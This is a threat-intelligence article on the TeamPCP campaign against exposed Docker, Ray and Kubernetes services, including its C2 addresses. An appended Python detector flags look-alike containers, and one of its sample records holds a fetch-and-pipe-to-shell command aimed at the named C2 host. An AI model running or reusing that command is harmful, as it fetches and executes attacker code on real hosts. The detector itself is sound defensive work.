TeamPCP, also known as PCPcat, ShellForce, and DeadCatx3, emerged in December 2025 as a sophisticated cloud-native threat actor targeting exposed Docker APIs, Kubernetes clusters, Ray dashboards, Redis servers, and React2Shell vulnerabilities.
The group launched a massive campaign designed to build a distributed proxy and scanning infrastructure at scale, then compromise servers to exfiltrate data, deploy ransomware, conduct extortion, and mine cryptocurrency.
Activity peaked sharply around Christmas Day 2025, after which infrastructure went largely quiet, though members publicly celebrated stolen data across Telegram channels.
What sets TeamPCP apart is not technical innovation but operational scale and integration.
The campaign weaponizes well-documented vulnerabilities into a cloud-native exploitation platform that turns exposed infrastructure into a self-propagating criminal ecosystem.
The strength lies in large-scale automation rather than novel exploits. Compromised servers are repurposed for cryptomining, proxy networks, command-and-control relays, scanning operations, and data hosting.
Flare researchers identified 185 compromised servers running attacker-deployed containers executing standardized command patterns, providing clear visibility into TeamPCP tradecraft.
Beyond the primary command-and-control node at 67.217.57.240, which appeared on 182 compromised hosts, investigators also identified secondary infrastructure at 44.252.85.168, observed on three additional victim servers.
The presence of multiple control endpoints suggests operational redundancy or early-stage infrastructure migration.
Most of the leaked data comes from organizations in Western countries, concentrated in the e-commerce, finance, and human resources sectors. Cloud-hosted victims dominate: Azure accounts for 61% and AWS for 36% of compromised servers, together representing 97% of affected infrastructure.
Attack Mechanism and Worm-Like Propagation
TeamPCP operations begin with automated scanning across massive IP ranges to discover exposed Docker APIs and Ray dashboards.
Once access is confirmed, the group deploys malicious containers or jobs remotely through unauthenticated management APIs.
For Docker, they pull an Alpine image and launch a host-networked, auto-restarting container that fetches and executes remote scripts. For Ray, they submit jobs executing base64-encoded bootstrap payloads.
The proxy.sh script acts as the campaign’s operational backbone, installing proxy utilities, peer-to-peer tools, tunneling capabilities, and additional scanners that continuously search the internet for vulnerable servers.
To ensure long-term persistence, the script registers multiple system services, effectively turning each infected host into a self-maintaining scanning and relay node.
When Kubernetes environments are detected, the script branches into a separate execution path and drops cluster-specific secondary payloads, indicating distinct tooling for cloud-native targets rather than generic Linux malware.
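A defender-side check for the Docker tradecraft described above, written as an added example (not code from the article or from Flare): it walks `docker inspect` records and flags containers that combine the traits the campaign uses (Alpine image, host networking, auto-restart, a fetch-and-pipe-to-shell command) or that reference the two control addresses named in the article. The sample records are constructed; the `proxy.sh` URL path in the sample is an assumption for illustration.

```python
import json
import re
import sys

# Control addresses quoted in the article above.
TEAMPCP_C2 = {"67.217.57.240", "44.252.85.168"}
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# "curl|wget ... | sh" style bootstrap: fetch a remote script and execute it.
FETCH_EXEC = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b")

def indicators(container):
    """Return the TeamPCP-style traits present in one `docker inspect` record."""
    cfg = container.get("Config") or {}
    host = container.get("HostConfig") or {}
    cmd = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
    found = []
    if (cfg.get("Image") or "").lower().startswith("alpine"):
        found.append("alpine-image")
    if host.get("NetworkMode") == "host":
        found.append("host-network")
    if (host.get("RestartPolicy") or {}).get("Name") in ("always", "unless-stopped"):
        found.append("auto-restart")
    if FETCH_EXEC.search(cmd):
        found.append("remote-script-exec")
    if TEAMPCP_C2 & set(IPV4.findall(cmd)):
        found.append("known-c2")
    return found

def is_teampcp_like(container):
    """A known C2 address is enough on its own; otherwise require the
    fetch-and-execute trait plus at least two of the container traits."""
    found = indicators(container)
    return "known-c2" in found or ("remote-script-exec" in found and len(found) >= 3)

def scan(containers):
    """Names of containers in a `docker inspect` JSON array that match."""
    return [c.get("Name", "?") for c in containers if is_teampcp_like(c)]

# Constructed records, abridged to the fields the checks use.
SAMPLE = [
    {"Name": "/legit-web", "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
     "HostConfig": {"NetworkMode": "bridge", "RestartPolicy": {"Name": "always"}}},
    {"Name": "/sharp_newton", "Config": {"Image": "alpine:latest",
     "Cmd": ["sh", "-c", "wget -qO- http://67.217.57.240/proxy.sh | sh"]},  # path assumed
     "HostConfig": {"NetworkMode": "host", "RestartPolicy": {"Name": "always"}}},
    {"Name": "/ci-runner", "Config": {"Image": "alpine:3.19", "Cmd": ["sh", "-c", "apk add curl && ./run.sh"]},
     "HostConfig": {"NetworkMode": "host", "RestartPolicy": {"Name": "no"}}},
]

if __name__ == "__main__":
    records = SAMPLE if sys.stdin.isatty() else json.load(sys.stdin)
    for name in scan(records):
        print("suspicious container:", name)
```

On a live host, pipe `docker inspect $(docker ps -aq)` into the script to check every container, including stopped ones.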